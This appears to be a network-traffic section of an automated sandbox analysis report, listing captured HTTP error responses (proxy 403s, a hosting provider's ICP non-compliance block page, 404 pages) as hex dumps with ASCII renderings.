3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 07:37:18 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 07:37:18 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 07:37:19 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 07:37:19 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 07:37:19 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 07:37:20 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:20 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.22.1Date: Mon, 11 Mar 2024 07:37:20 GMTContent-Type: text/htmlContent-Length: 555Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.22.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable M
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailable
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: MyWebServer/3.6.20 Unicode (By TGY)Date: Mon, 11 Mar 2024 07:37:20 GMTContent-Type: text/html; Charset=GB2312Content-Length: 154Connection: Keep-AliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 3e 3c 68 33 3e 4d 79 57 65 62 53 65 72 76 65 72 2f 33 2e 36 2e 32 30 20 55 6e 69 63 6f 64 65 20 28 42 79 20 54 47 59 29 3c 2f 68 33 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1><hr><h3>MyWebServer/3.6.20 Unicode (By TGY)</h3></center></body></html>
